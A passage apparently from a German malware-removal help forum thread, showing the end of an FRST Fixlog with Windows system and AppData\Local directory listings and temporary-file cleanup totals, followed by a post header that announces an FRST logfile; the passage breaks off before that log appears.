12.08.2016  18:47        12.574.208 wmploc.DLL
08.12.2015  23:54           740.352 wmpmde.dll
21.11.2010  05:25           144.384 wmpps.dll
21.11.2010  05:25           105.472 wmpshell.dll
21.11.2010  05:25           182.272 wmpsrcwp.dll
14.07.2009  03:16            11.264 wmsgapi.dll
08.12.2015  23:54           739.328 WMSPDMOD.DLL
08.12.2015  23:54         1.325.056 WMSPDMOE.DLL
21.11.2010  05:24         2.504.192 WMVCORE.DLL
08.12.2015  23:54         1.620.992 WMVDECOD.DLL
14.07.2009  03:16           144.896 wmvdspa.dll
08.12.2015  23:54         1.568.768 WMVENCOD.DLL
08.12.2015  23:54           541.184 WMVSDECD.DLL
08.12.2015  23:54           358.400 WMVSENCD.DLL
08.12.2015  23:54           665.088 WMVXENCD.DLL
28.04.2017  02:32             5.120 wow32.dll
14.07.2009  01:16            14.336 wowreg32.exe
07.12.2012  14:26           308.736 Wpc.dll
14.07.2009  03:16           128.512 wpcao.dll
14.07.2009  03:16            10.752 wpcsvc.dll
29.01.2015  05:02         2.311.168 wpdshext.dll
14.07.2009  03:14            30.208 WPDShextAutoplay.exe
21.11.2010  05:25           105.984 WPDShServiceObj.dll
21.11.2010  05:25           350.720 WPDSp.dll
21.11.2010  05:25           198.144 wpdwcn.dll
14.07.2009  03:14             9.216 write.exe
14.07.2009  03:11             4.608 ws2help.dll
11.05.2016  17:19           206.336 ws2_32.dll
21.11.2010  05:25            51.712 wscapi.dll
14.07.2009  03:16            95.744 wscinterop.dll
14.07.2009  03:16            18.944 wscisvif.dll
14.07.2009  03:16            56.832 wscmisetup.dll
14.07.2009  03:16             9.728 wscproxystub.dll
12.10.2013  03:15           141.824 wscript.exe
14.07.2009  03:14         1.140.736 wscui.cpl
21.11.2010  05:24           458.752 WSDApi.dll
21.11.2010  05:23            21.504 wsdchngr.dll
14.07.2009  03:16         1.294.336 wsecedit.dll
21.11.2010  05:24            36.352 wshbth.dll
14.07.2009  03:16            25.600 wshcon.dll
14.07.2009  03:16            15.360 wshelper.dll
14.07.2009  03:16            80.896 wshext.dll
14.07.2009  03:16            10.752 wship6.dll
21.11.2010  05:24            11.264 wshirda.dll
12.10.2013  04:04           121.856 wshom.ocx
14.07.2009  03:16            13.824 wshqos.dll
05.11.2015  21:02            14.848 wshrm.dll
14.07.2009  03:16             9.216 WSHTCPIP.DLL
10.06.2009  23:40             4.675 wsmanconfig_schema.xml
06.08.2016  16:53           199.168 WSManHTTPConfig.exe
06.08.2016  17:15           249.344 WSManMigrationPlugin.dll
06.08.2016  17:15           146.944 WsmAuto.dll
06.08.2016  16:53            10.240 wsmplpxy.dll
06.08.2016  16:53            12.288 wsmprovhost.exe
10.06.2009  23:40             1.559 WsmPty.xsl
06.08.2016  17:15            54.272 WsmRes.dll
06.08.2016  17:15         1.178.112 WsmSvc.dll
10.06.2009  23:40             2.426 WsmTxt.xsl
06.08.2016  17:15           214.016 WsmWmiPl.dll
21.11.2010  05:23            51.712 wsnmp32.dll
14.07.2009  03:16            15.360 wsock32.dll
21.11.2010  05:25            68.608 WSTPager.ax
21.11.2010  05:23            40.448 wtsapi32.dll
22.03.2017  17:05           573.440 wuapi.dll
22.03.2017  17:05            35.328 wuapp.exe
22.03.2017  17:05            93.696 wudriver.dll
22.03.2017  17:05            30.208 wups.dll
21.11.2010  05:24           314.880 wusa.exe
22.03.2017  17:24           174.080 wuwebv.dll
21.11.2010  05:24           444.928 wvc.dll
14.07.2009  03:16           284.672 WWanAPI.dll
14.07.2009  03:16            27.648 wwapi.dll
14.07.2009  03:16            80.896 wzcdlg.dll
05.09.2009  03:44            69.464 XAPOFX1_3.dll
05.09.2009  03:44           515.416 XAudio2_5.dll
14.07.2009  03:14            36.864 xcopy.exe
14.07.2009  03:16            25.600 XInput9_1_0.dll
14.07.2009  03:16            54.784 xmlfilter.dll
06.01.2012  14:09           180.224 xmllite.dll
14.07.2009  03:16            17.920 xmlprovi.dll
14.07.2009  03:16            47.616 xolehlp.dll
14.07.2009  03:16           601.600 XpsFilt.dll
01.05.2013  08:32           364.544 XpsGdiConverter.dll
01.05.2013  08:32         1.158.144 XpsPrint.dll
21.11.2010  05:24           135.168 XpsRasterService.dll
14.07.2009  03:14         3.405.312 xpsrchvw.exe
10.06.2009  23:15            76.060 xpsrchvw.xml
21.11.2010  05:24         1.712.640 xpsservices.dll
14.07.2009  03:16           443.904 XPSSHHDR.dll
14.07.2009  03:16           930.816 xpssvcs.dll
08.11.2012  15:07    <DIR>          XPSViewer
10.06.2009  23:42             4.041 xwizard.dtd
14.07.2009  03:14            41.472 xwizard.exe
14.07.2009  03:16           354.816 xwizards.dll
14.07.2009  03:16            85.504 xwreg.dll
14.07.2009  03:16           158.208 xwtpdui.dll
14.07.2009  03:16           107.520 xwtpw32.dll
01.05.2013  08:40    <DIR>          zh-CN
01.05.2013  08:40    <DIR>          zh-HK
01.05.2013  08:40    <DIR>          zh-TW
21.11.2010  05:24           327.680 zipfldr.dll
31.08.2010  11:44           548.864 zvkonline60VC8.dll
31.08.2010  11:19           552.960 zvkonline65VC8.dll
29.08.2010  17:42           552.960 zvkonline70VC8.dll
21.09.2010  19:01           557.056 zvkonline80VC8.dll
03.02.2014  20:27               242 _TraceLog.txt
11.09.2013  17:36        97.124.766 ????
01.11.2013  18:56       104.569.497 ????
            2364 Datei(en),  1.441.125.306 Bytes
              84 Verzeichnis(se), 115.087.720.448 Bytes frei

========= Ende von CMD: =========


========= dir C:\Users\Markus\AppData\Local =========

 Datentr„ger in Laufwerk C: ist System
 Volumeseriennummer: 3ADE-27E0

 Verzeichnis von C:\Users\Markus\AppData\Local

25.05.2017  21:44    <DIR>          .
25.05.2017  21:44    <DIR>          ..
05.12.2015  10:11    <DIR>          Adobe
08.11.2012  18:37    <DIR>          Apple
18.11.2012  23:19    <DIR>          Apple Computer
26.01.2012  23:51    <DIR>          Broadcom
03.12.2014  17:58    <DIR>          CANON_INC
05.12.2015  10:11    <DIR>          CEF
24.05.2017  06:14    <DIR>          CrashDumps
30.04.2017  18:00    <DIR>          CUSTPDF Writer
07.11.2012  10:12    <DIR>          CyberLink
27.11.2012  22:00             3.584 DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
12.05.2017  20:47    <DIR>          Diagnostics
31.01.2013  20:47    <DIR>          DoNotTrackPlus
18.11.2012  23:18    <DIR>          Downloaded Installations
27.01.2017  17:55    <DIR>          Duwisyatapot
13.05.2017  11:56    <DIR>          ElevatedDiagnostics
13.11.2012  12:05    <DIR>          fontconfig
17.05.2017  09:19    <DIR>          FreePDF_XP
18.01.2015  18:23           115.176 GDIPFONTCACHEV1.DAT
13.11.2012  12:05    <DIR>          gegl-0.2
27.04.2017  19:19    <DIR>          Google
07.06.2015  12:04    <DIR>          GWX
18.01.2015  18:31    <DIR>          HL
11.02.2014  21:32    <DIR>          HP
16.05.2017  23:02    <DIR>          inst
04.03.2014  18:39    <DIR>          Lexware
08.11.2012  21:56    <DIR>          Macromedia
23.04.2017  09:53    <DIR>          Microsoft
18.12.2013  21:53    <DIR>          Microsoft Help
27.04.2017  19:49    <DIR>          Mozilla
30.01.2017  18:58    <DIR>          Nero
11.11.2012  23:01    <DIR>          Nero_AG
15.02.2016  19:01    <DIR>          NVIDIA
22.06.2015  19:42    <DIR>          NVIDIA Corporation
08.02.2017  18:05    <DIR>          Package Cache
20.11.2016  19:06    <DIR>          Paint.NET
08.11.2012  18:35    <DIR>          Programs
30.01.2016  21:00             3.339 recently-used.xbel
05.01.2016  12:15    <DIR>          Skype
25.05.2017  21:49    <DIR>          Temp
03.02.2016  18:43    <DIR>          VirtualStore
30.03.2016  18:10    <DIR>          Windows Live
17.03.2015  20:00    <DIR>          Windows Live Writer
08.02.2016  19:18    <DIR>          {006A0F6F-7817-4F8C-9766-559DF3DC258A}
22.11.2012  20:47    <DIR>          {030E6A11-BBF9-4256-A0D7-0FAFC0121633}
19.01.2016  10:39    <DIR>          {0494E91B-C1CA-4CF9-903A-349F636B9BC0}
18.04.2017  20:16    <DIR>          {05D85A6E-197B-4AA5-9714-87540CF28916}
21.03.2015  16:19    <DIR>          {070FDB38-109B-467F-918C-039E766736B1}
11.05.2015  19:49    <DIR>          {0725C1E9-73F0-4CCB-B5EB-979D860779D4}
28.06.2014  18:40    <DIR>          {07E81132-6E61-4831-839A-1005EE23CB55}
06.06.2013  17:10    <DIR>          {0837729D-A2F0-454B-84D2-9211DA0C9B4F}
06.01.2017  17:55    <DIR>          {099420EB-7AB9-4DA5-9192-82024D8B5319}
20.04.2013  13:38    <DIR>          {0DB7F722-0DEA-4ED7-93F6-B67A126EF966}
26.03.2016  18:16    <DIR>          {100CBA73-9193-4A92-A6F7-3E257A729F7E}
20.09.2015  15:58    <DIR>          {10C42E0C-4828-4042-B7F9-F67F326B6163}
02.03.2014  23:33    <DIR>          {126A2B4D-0700-4653-B661-9B3FB42BDC01}
09.11.2013  18:53    <DIR>          {13D7FFBD-0ADC-4F5F-A034-82D57C5CBF1C}
22.04.2017  18:27    <DIR>          {140B0B5C-A1F5-4808-AD0D-2A1D5A214132}
12.05.2015  20:29    <DIR>          {14C8EEFE-76CC-42D7-A42E-DE1FAA680D44}
10.03.2017  20:46    <DIR>          {1717CB09-9F15-425E-B2AD-B2051CF57FEC}
01.03.2015  12:22    <DIR>          {19E2B73A-3CBA-4E46-9069-12BB99216829}
08.01.2014  13:05    <DIR>          {1E8CFFA4-6846-4CE0-8414-C493F948561B}
02.08.2015  20:13    <DIR>          {20BE7D3E-6778-43E6-A671-CCEE934F99AA}
06.11.2013  20:55    <DIR>          {21491C2F-94F8-4D51-806C-A74E50AE4B43}
13.11.2013  13:14    <DIR>          {23BBB9A7-0C5E-40B5-9911-263A3454CECA}
05.04.2015  13:05    <DIR>          {24254644-C4B7-4ADF-89B4-AEDE38B7BD53}
07.03.2015  19:09    <DIR>          {2428CED3-9E54-4E2E-B958-7E3C51DB3D91}
28.03.2015  16:18    <DIR>          {257C3B5B-CC2A-44F7-8245-A39C92E9233B}
31.05.2014  19:31    <DIR>          {25D413FA-D749-4153-981C-763ED78D3A06}
08.03.2015  18:54    <DIR>          {26664071-8ECA-41A2-8E46-625C7EF6E660}
28.02.2016  17:22    <DIR>          {27532F04-EEFF-42C9-A025-0770C943B604}
24.11.2013  11:53    <DIR>          {27B3F8BD-7893-4C9C-8DFA-0102679BFF9F}
12.09.2016  07:00    <DIR>          {27D9138F-5F6B-464D-BFB5-A2EBFF82AD61}
21.01.2014  09:45    <DIR>          {28516838-6DD3-4EC0-8DBF-BB545A63D05D}
12.03.2017  15:32    <DIR>          {2A10B088-5F9A-4B5E-8793-443B44E56A0C}
08.07.2016  21:19    <DIR>          {2FFAE7E3-1623-4A0A-A92A-B6A97A140876}
17.01.2016  18:57    <DIR>          {300400FB-445B-41C8-B7DD-43AA8ED7C22A}
09.01.2015  21:44    <DIR>          {30AF2152-B2A5-4275-A1DD-43D11FA3C405}
25.05.2015  19:23    <DIR>          {30F1E2C2-C55E-4D9D-92B1-B4D1A73CC102}
04.03.2016  09:30    <DIR>          {327104D5-FD3D-42EE-A78D-92EA8E3DD7CB}
31.01.2016  16:57    <DIR>          {340F5A90-AB8C-4DBE-B7EF-A0D05F9C6214}
22.11.2012  21:05    <DIR>          {36265B23-5D02-497B-85E6-D3D7FAAEF0E1}
13.05.2015  19:02    <DIR>          {370BE764-78CB-4F36-82A5-FC6390AB91FE}
18.05.2013  10:55    <DIR>          {3A2CB070-EE29-4C1A-8040-4216CC61D63A}
14.11.2012  09:44    <DIR>          {3B1B707C-0706-4BE0-9A20-7252286DA835}
08.11.2014  10:24    <DIR>          {3BD4751D-ABE9-4100-95C8-AD6524CCCBD1}
23.04.2016  14:00    <DIR>          {3C4F8C4D-8F65-4FC7-8C3C-332AF1500505}
09.03.2016  10:03    <DIR>          {3F2059D6-9B37-4A13-AC9A-6FA93F1A6435}
10.08.2015  21:01    <DIR>          {4234BDE3-6357-4DC0-9BA2-E6ABAA5090D3}
17.02.2014  22:39    <DIR>          {42D292D0-D77C-4894-B568-3D50018826C3}
10.05.2014  12:25    <DIR>          {451A3116-928F-422C-BE62-FCC626B01EA4}
06.05.2014  11:18    <DIR>          {457AEEF4-B2CD-4CAB-B74B-9DE29FF44563}
13.06.2015  12:35    <DIR>          {45C716B3-ABB9-4D49-A7D9-97B51D5BB077}
13.07.2014  21:59    <DIR>          {4743B304-E70F-4512-BDB7-ED326703E295}
20.12.2015  20:21    <DIR>          {47B68410-D56A-4416-BEA5-CE834F2AF4CD}
29.05.2014  14:41    <DIR>          {47F0F98B-D72C-4B95-99DA-71F093B63BA2}
23.10.2013  12:21    <DIR>          {4A85A8B5-6C47-49CF-95D3-5DF98E87DC49}
31.03.2015  19:24    <DIR>          {4C488F72-14B8-49A1-871C-6F47D6B77A5F}
26.01.2016  21:00    <DIR>          {4CA6870E-687D-4EBA-95B5-8267810572CA}
05.11.2013  20:58    <DIR>          {4D2F8596-3969-4A9C-B2C6-2517B6F88360}
03.01.2013  10:56    <DIR>          {4F0634B3-207D-4E86-9595-23EFB5A9F9B2}
23.03.2017  20:45    <DIR>          {4F8BC0E6-2FFE-429E-B22E-1C8A483C3292}
26.12.2016  20:35    <DIR>          {507E1DFD-F210-4241-A53B-6A4F3A8F8CFB}
19.09.2016  21:29    <DIR>          {516D1A03-868F-4E4D-B0EE-5B2B3539E51B}
13.04.2017  22:05    <DIR>          {51F9A9AB-11B3-41B0-9F36-8E99D914D19C}
31.07.2013  21:22    <DIR>          {51FFBDEE-A9EE-4E9D-822A-63F10D2E8F7E}
18.03.2017  09:14    <DIR>          {52B32EC6-011A-4DA3-9288-E8E60139E12E}
02.10.2015  19:15    <DIR>          {53863098-A9D1-403E-B67F-E48FB48E7C4F}
01.12.2013  12:02    <DIR>          {54E32B8D-87AC-4C1F-9DDB-646E8BCB4DEC}
20.02.2014  12:56    <DIR>          {5585326A-94F0-446E-899B-DF3C63806484}
01.05.2016  21:40    <DIR>          {5664FEF3-347D-43C6-888F-C038B8C15D87}
26.05.2014  21:20    <DIR>          {57B4035E-7EC4-4925-A61A-1FD1873A0F3A}
10.11.2012  14:00    <DIR>          {586E74F0-2EAC-4130-9490-80BB2498A3BD}
16.03.2014  12:05    <DIR>          {5907BFB6-0BBE-4949-A171-5465FD899200}
08.12.2016  22:19    <DIR>          {5A0ED8C9-C381-49DD-B5AB-CFD14BE1F352}
05.04.2014  12:13    <DIR>          {5B40DF12-A30A-4087-AD68-5EFD5CC7FDB2}
17.04.2017  17:24    <DIR>          {5C1A77F1-1980-4D54-913B-4C307FC9F0F7}
09.12.2012  23:22    <DIR>          {5D1F5E1C-F100-42C7-9BE2-A1A45AF1805A}
02.06.2014  20:30    <DIR>          {5D2DE0DE-627C-49EC-B913-B096156ED4A9}
02.04.2016  19:22    <DIR>          {5E2353C1-C1B0-4167-95AA-6F416E1599EE}
19.04.2015  09:58    <DIR>          {5EB5A42B-247A-456C-9D05-7BF3CF31F6F8}
17.03.2015  19:53    <DIR>          {5F4C57EB-A580-4553-B424-711F97F8FF9E}
14.06.2015  20:46    <DIR>          {5FFACC6E-8CF2-4EB5-A5C3-06F341193D47}
26.12.2015  00:15    <DIR>          {5FFCD910-47A7-4EB6-B0FD-C1F6A1036B2E}
12.06.2013  18:42    <DIR>          {610BBD3D-38B1-4A77-A892-F4C22D612BE8}
08.04.2013  20:08    <DIR>          {61D0E598-7D65-4CF7-9146-5AA1E650E4D1}
26.05.2013  23:23    <DIR>          {63665CB4-3394-4ECB-9B1E-31D77DE165BC}
11.10.2014  20:17    <DIR>          {63A2E9C1-EC90-414F-9AF0-D8416D6F727A}
13.11.2016  20:28    <DIR>          {642BCEC3-A78C-44E8-AD50-5E718622C680}
03.07.2013  22:31    <DIR>          {6496098F-4785-4F37-BE88-DFF736CC405B}
18.06.2015  18:35    <DIR>          {64EC98BA-C83A-4166-A055-7D354882B0EC}
03.09.2013  13:14    <DIR>          {658C71C0-7D7D-4F4A-B1F8-3D1BB911C470}
27.02.2016  15:40    <DIR>          {66BBDEDD-3CED-48B0-A8F3-213C6D9D55AF}
06.06.2015  12:24    <DIR>          {68562A97-8B5C-42F2-A48B-A98D791E3F3C}
19.09.2014  20:49    <DIR>          {695B05E4-63F0-405B-8CE7-B6678115D28A}
28.07.2013  19:34    <DIR>          {6AACF748-67D6-4DF1-AD19-EC8B87B135D1}
23.04.2017  22:46    <DIR>          {6C9E99E8-29C3-4435-A0EF-079701803673}
12.09.2015  18:06    <DIR>          {72FB8C0C-3DA8-4396-8CA0-3436B3874296}
01.02.2014  18:18    <DIR>          {7345C136-7DD6-4F1B-BF48-8AB4D5A6E194}
28.06.2015  20:47    <DIR>          {73F162C3-3B77-4756-8336-FBD67974E447}
20.10.2016  17:15    <DIR>          {7484FE08-12E5-4F08-AA72-40760E6A3E6B}
18.09.2016  12:05    <DIR>          {7512A2AD-7594-4FEA-A579-3AA54EF672E2}
09.11.2016  22:32    <DIR>          {754E5A36-820D-4F1D-88EF-460D2BA57485}
21.04.2014  13:44    <DIR>          {75BBC268-DCE8-4C14-AF72-F3BD702FF8A7}
22.01.2017  17:52    <DIR>          {7A006ECD-17CB-4174-A879-D74CFBEE3FE3}
04.03.2013  14:08    <DIR>          {7B2C4E0A-6B7A-4C44-AEF5-48CE9777FC5C}
25.01.2016  11:25    <DIR>          {7D59D282-16A7-4C1C-B639-30145551EE41}
29.06.2016  17:00    <DIR>          {7DDCE0E1-26AF-4BD5-B790-65C50623B351}
10.04.2016  11:21    <DIR>          {7DE3C64B-EA01-4E09-B7EE-7DF9F7D8DA6C}
26.05.2013  10:28    <DIR>          {7F1E6A25-B801-43C1-94E4-8327CCA79AE0}
30.10.2016  18:42    <DIR>          {80CA6243-9630-4C6D-B6C9-B1698F889BFA}
01.12.2016  19:25    <DIR>          {81CB2C32-E01F-433F-B728-9E314B3ED1E4}
03.01.2016  21:34    <DIR>          {82A91F51-7A4C-41E9-88E7-8F047575B2A3}
25.11.2013  11:35    <DIR>          {82B14430-6691-4AFC-927C-1C983629F09C}
21.07.2015  19:15    <DIR>          {83E37120-D0D0-49DA-848E-2AF4514D76AB}
18.06.2015  18:59    <DIR>          {86181EE7-C303-4049-A432-C421F43C65A4}
13.09.2013  18:55    <DIR>          {865FC74D-09E6-40C3-88C7-4794719506B6}
14.03.2014  11:00    <DIR>          {87DF7243-0A8B-496C-A826-08C6F7E3B346}
03.12.2013  12:47    <DIR>          {89456C44-61C4-4354-B811-356B243D30AA}
06.04.2014  20:17    <DIR>          {89A45A40-1483-422F-BAE6-4780AA8F28FE}
01.10.2015  18:46    <DIR>          {8AF7AE03-17CC-44EB-AC85-C13D361B2DEE}
24.04.2016  17:03    <DIR>          {8F362E8B-A840-4C62-9C62-9FCB96865AED}
23.12.2015  16:05    <DIR>          {8F3ADF9D-0A83-41B9-8C03-EFB6C0A3900F}
07.02.2015  12:26    <DIR>          {90F08974-D19A-44EE-89B4-AA65D0E3B28E}
23.02.2014  09:46    <DIR>          {915CB985-D026-484C-BF24-A1850E81D6D5}
01.11.2016  12:47    <DIR>          {96C02142-BA62-4A5B-8404-962F5BEF6F7D}
29.05.2013  20:39    <DIR>          {96F82CCB-A15D-4B72-B75B-0FD7B6308978}
13.12.2014  20:00    <DIR>          {97199599-7E3F-4B88-A19D-88EA94516DC8}
18.05.2016  19:16    <DIR>          {97445900-3DE8-4382-83C5-1ED50F466980}
07.01.2016  20:40    <DIR>          {98D020EA-684A-47C4-B48E-57147D5F6A64}
24.01.2015  23:00    <DIR>          {98EAB583-6A46-4E20-8041-C698DF79C1A9}
13.05.2017  20:30    <DIR>          {991DAACD-0AC8-4F88-9A36-26B7D28A3D35}
02.12.2013  22:24    <DIR>          {991F426F-DEC9-4CF6-BF7D-47B37F0DB592}
08.11.2015  14:52    <DIR>          {997894F3-698B-4559-9D33-ABBF695C161D}
10.05.2015  11:31    <DIR>          {99AE3066-7380-474D-81E4-E35A580532EA}
28.07.2016  22:37    <DIR>          {99B31C46-AD34-4F77-A358-CE14D3562FFC}
12.01.2014  18:03    <DIR>          {99C61E25-4C83-4416-9260-7D3F81E4B7C6}
28.08.2016  21:26    <DIR>          {9BD46FB6-9522-486E-B8B0-4A077DBF9820}
17.10.2014  15:38    <DIR>          {9C89EE5F-66ED-4CAA-A545-B5690835B958}
11.07.2015  14:14    <DIR>          {9C94F10B-E8AA-49C4-9E60-B2C3539BDC19}
30.06.2013  19:15    <DIR>          {9E74265D-25C1-4ABB-BD96-0BE53AB8DA58}
09.11.2014  19:14    <DIR>          {9F5229A7-297B-4A54-8106-16F32EF3F75D}
02.12.2016  18:15    <DIR>          {A2AE6D05-9C01-45F9-9DA0-345175CBC53A}
18.03.2014  20:33    <DIR>          {A2EEC690-16C4-4D17-8940-EE26C648F432}
04.05.2014  17:45    <DIR>          {A3F0E8B4-F364-4C9A-8521-F7ACD43BBE40}
16.04.2016  15:21    <DIR>          {A40A5E90-EAFA-4F80-87C5-A73787489DF8}
22.04.2017  17:53    <DIR>          {A5B0ABC6-5859-46DB-B69D-5F36B7D7E8EC}
05.10.2014  07:58    <DIR>          {A8A930B3-1EB3-4DBA-AD7D-A5EC3C0C3EC7}
22.12.2016  11:40    <DIR>          {A9E72905-C714-42A1-8FD7-CB332A4C99E4}
03.12.2016  17:19    <DIR>          {AD4728FC-8AEE-4396-BB1C-91EE01AA76B8}
02.07.2013  10:04    <DIR>          {ADE5B89E-F3FD-4FF2-AA92-10B907E8B400}
29.02.2016  17:49    <DIR>          {AE9BB387-84A1-4A74-B3F3-499E8104AAAD}
05.03.2017  20:36    <DIR>          {AF5D0A94-E422-459E-8657-667717A1D8CF}
10.11.2013  12:57    <DIR>          {B1E36DA2-4D0D-4F37-AA8E-EB7A419D87C0}
10.02.2015  20:05    <DIR>          {B2A505AE-FBA3-46DB-82BE-C1DAB7C20B37}
09.04.2017  20:05    <DIR>          {B50273B7-1BC2-469A-A2F8-999971EB3260}
19.03.2014  12:09    <DIR>          {B5362F06-2463-478F-80ED-BCADD5CEE041}
14.08.2013  11:28    <DIR>          {B6348AB9-0D13-4A81-9EA6-61C7BF78BBC7}
29.06.2014  12:51    <DIR>          {B83CC498-9E37-48DD-B3EB-9F6ADC5A32EB}
23.06.2015  18:07    <DIR>          {BACDD177-B64A-4DFB-9679-1A31493CA2C0}
21.12.2014  17:51    <DIR>          {BB4B7D67-8C61-41BF-92A3-113F1661030C}
18.10.2016  18:31    <DIR>          {BB617228-4D0C-41D0-B72B-0E7965D0529B}
28.02.2017  19:51    <DIR>          {BC14EC85-5A89-4637-8B1B-108A4ED977C2}
08.08.2016  21:32    <DIR>          {BCC8AD8C-E5C0-4581-8CB6-63FA20109649}
26.12.2015  18:39    <DIR>          {BEBC5353-B89C-49E2-9E58-A83D6BDC0411}
16.10.2014  20:20    <DIR>          {BF92BC03-FB44-404E-BA34-38B09488A3D1}
01.02.2015  14:42    <DIR>          {C05F909B-47AE-461F-BCC8-8F91C98C1FA6}
11.10.2015  10:55    <DIR>          {C272598E-26E8-48CB-9FFF-0362102E8800}
14.02.2015  14:34    <DIR>          {C68C5C6B-C6F8-46B6-93C8-3FBECBEECCF5}
11.06.2014  11:53    <DIR>          {C72CBB89-6F8D-4B7F-8921-E3DD56D9341B}
18.01.2015  14:22    <DIR>          {C91984AA-71E2-46F2-B084-D76816A544C9}
07.01.2014  18:38    <DIR>          {C9B19127-3BD3-43C9-864D-87941621F53B}
17.11.2013  19:13    <DIR>          {CA6D02E1-7E9D-4E64-AC19-F15903A169FE}
01.06.2013  17:11    <DIR>          {CDA9A9E0-CB72-4A4B-8230-FE02D501339F}
25.12.2012  11:17    <DIR>          {CE10FDA6-AB82-440F-B9FE-35559EA08B6E}
23.01.2016  18:06    <DIR>          {CE614241-ECD8-4677-BE02-9AFBCC489628}
25.05.2016  20:03    <DIR>          {D016D894-7B62-41F1-B9F1-92D8E5EA067C}
19.06.2014  09:16    <DIR>          {D03B3DF8-82C5-4D9D-8696-08DE6CF47930}
16.12.2015  22:58    <DIR>          {D105335F-B55E-4FD6-B30C-7E6E2E4029D5}
21.04.2017  09:52    <DIR>          {D1FF043E-E888-4F8C-890F-409848E25675}
13.11.2012  12:37    <DIR>          {D21488A0-79D7-48B3-B6FE-9CBEF733B650}
07.02.2014  21:32    <DIR>          {D25B6A7F-2645-46EE-9D31-3F48F6253D9F}
01.08.2016  21:39    <DIR>          {D268B050-C0BD-468C-8B56-D293F8DD6571}
11.03.2017  19:36    <DIR>          {D27D4A87-0302-45BB-8868-C245DE0E6486}
22.02.2016  21:30    <DIR>          {D3D4F1BE-3AF1-4844-A925-719D2EB6C674}
04.12.2013  14:00    <DIR>          {D40F9C90-EBCE-4487-A20E-67AA84D0F486}
12.04.2017  08:17    <DIR>          {D4A906ED-765B-447B-A705-3E08C47BFCFB}
12.10.2014  18:33    <DIR>          {D5FBFAA9-3066-4EED-9670-81A0F0C97DF0}
11.12.2016  15:13    <DIR>          {D69FF47D-2133-4A4F-A769-BD6BC2FC4C84}
19.01.2013  11:41    <DIR>          {D787B751-2D23-42AE-9C29-88E23203F7A1}
30.01.2016  20:51    <DIR>          {DA998CC0-20A0-4E38-B9CC-72994B2F49DB}
07.07.2016  21:07    <DIR>          {DAAEAC18-1A55-4821-A4F1-CE059037FA10}
25.05.2017  21:44    <DIR>          {DC104DB5-E812-4806-8E79-5424BA963F2F}
30.08.2015  18:28    <DIR>          {DE30BCE3-D6B4-457D-A279-0E5CB23CD1A4}
10.11.2013  12:51    <DIR>          {DE88C767-8344-443B-ABB6-A0852DE64592}
08.05.2014  10:39    <DIR>          {DF21F4DF-E2FE-45EF-A6E9-DBE10806E9FF}
31.03.2014  19:04    <DIR>          {DFF4BEB9-EF3C-4502-952D-013416521677}
27.06.2015  12:47    <DIR>          {E0219EF5-0D0F-4E64-BE9C-1833134D943E}
05.01.2015  20:34    <DIR>          {E1EB0E1F-6401-4F44-9016-6E71838BF8E1}
25.02.2015  20:07    <DIR>          {E26F5292-1828-4EBA-A380-45025E2D4362}
17.01.2016  20:14    <DIR>          {E293DB97-31D2-4F42-81FE-31274FF5AB05}
28.02.2014  07:59    <DIR>          {E5044477-8A45-4D97-8DD5-8746017099FB}
26.12.2016  20:32    <DIR>          {E9A231D4-F3BD-4882-BAEF-621BF07957F5}
23.06.2016  21:01    <DIR>          {EBEC4671-7029-4F09-959A-97F8B7330E4C}
15.11.2015  16:28    <DIR>          {ED487AB2-DA76-49E2-9EEC-D80FB00E5556}
04.12.2016  16:29    <DIR>          {ED8DE291-DFBF-458E-B14E-3C908C464E68}
27.02.2016  19:14    <DIR>          {EDD78760-A6FF-44FB-9275-C60527EE2B2C}
27.02.2014  07:55    <DIR>          {EED9982A-3D18-4DD6-B24E-8CBF0DB14936}
03.01.2013  12:37    <DIR>          {EFA9897D-9CB5-431B-A567-1FA4FE75A220}
17.09.2016  12:31    <DIR>          {EFEC80B9-D8B9-4514-90C9-BECDE45C5B17}
03.04.2014  18:53    <DIR>          {F05A010A-B383-41AB-A619-6B714A623ACF}
21.11.2014  20:13    <DIR>          {F093BFB3-7249-4D13-8AE0-4AF1817F6A11}
13.12.2016  20:16    <DIR>          {F1341935-1ACF-4460-ACE1-FD4E64A45033}
10.10.2015  14:03    <DIR>          {F1BB356A-7D82-498D-A6CB-8A22F91F9883}
17.12.2016  20:54    <DIR>          {F2664D2F-0B9F-45EA-AA6D-264B45157528}
09.06.2013  17:33    <DIR>          {F397DB26-A11B-4A50-95A4-F2749C666153}
11.09.2015  18:56    <DIR>          {F448CFFF-452A-4A59-9857-807964D96AA3}
26.02.2016  23:02    <DIR>          {F6C43322-B9E1-4532-840A-F9791FDB274C}
30.05.2016  13:28    <DIR>          {F7069179-6C6B-4030-8D15-2C5A82422FDB}
03.08.2016  07:34    <DIR>          {F84059D1-4493-44E0-9C21-26F50FAC0E3E}
14.10.2015  10:55    <DIR>          {F86FEB65-AF55-4BE8-B9CD-07431DBE3D9E}
04.03.2016  09:31    <DIR>          {F9BE5D33-0AB8-417A-A77D-A3613C306661}
02.11.2016  20:35    <DIR>          {FC3F9173-6D2C-471A-9A57-6E36CB57ABC8}
03.07.2016  08:49    <DIR>          {FD441BBD-0CC5-491D-8809-EA67CAD29B70}
04.12.2016  20:35    <DIR>          {FD4D915E-51F4-4D25-B8A0-EDA4E81E642E}
13.03.2015  20:39    <DIR>          {FD79FFD8-CD07-4975-ACCD-AB67C26C94D5}
14.09.2014  19:19    <DIR>          {FE3E1625-B9B6-41F7-AC35-5E7171B8808C}
26.08.2015  18:26    <DIR>          {FE5FD056-2E46-4F58-B68F-A724EF15AFB9}
12.09.2013  20:19    <DIR>          {FEE1E7E5-1ADD-48DB-9C2A-0EFE8E4E4467}
               3 Datei(en),        122.099 Bytes
             267 Verzeichnis(se), 115.087.642.624 Bytes frei

========= Ende von CMD: =========


=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 161785475 B
Java, Flash, Steam htmlcache => 1275 B
Windows/system/drivers => 46057002 B
Edge => 0 B
Chrome => 0 B
Firefox => 129366471 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 66228 B
Public => 0 B
ProgramData => 0 B
systemprofile => 42338137 B
systemprofile32 => 6062737 B
LocalService => 0 B
NetworkService => 22196 B
UpdatusUser => 0 B
Markus => 162468815 B

RecycleBin => 0 B
EmptyTemp: => 530.8 MB temporäre Dateien entfernt.

================================


Das System musste neu gestartet werden.

==== Ende von Fixlog 21:54:17 ====

MBJPaul · 25.05.2017, 21:15

FRST:

FRST Logfile:

Code:

ATTFilter

